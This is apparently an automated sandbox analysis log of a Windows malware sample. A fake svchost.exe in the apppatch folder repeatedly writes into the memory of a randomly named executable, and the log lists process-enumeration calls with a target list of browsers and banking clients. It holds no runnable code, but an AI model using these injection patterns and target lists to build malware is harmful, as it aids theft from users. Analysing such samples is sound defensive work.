Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1320000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1321000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1322000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1372000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 601000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 602000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 652000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A30000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A31000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1000000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1001000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1002000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1052000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 860000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 861000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 870000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 871000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 872000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 810000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 811000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 812000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 922000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1210000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1211000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1212000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1262000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1170000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1171000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1172000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1090000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1091000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A00000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A01000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 780000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 781000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 782000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 7D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 920000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 921000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 922000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 972000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 860000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 861000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 840000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 841000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 842000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 892000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C86370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01256370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|7_2_01056370
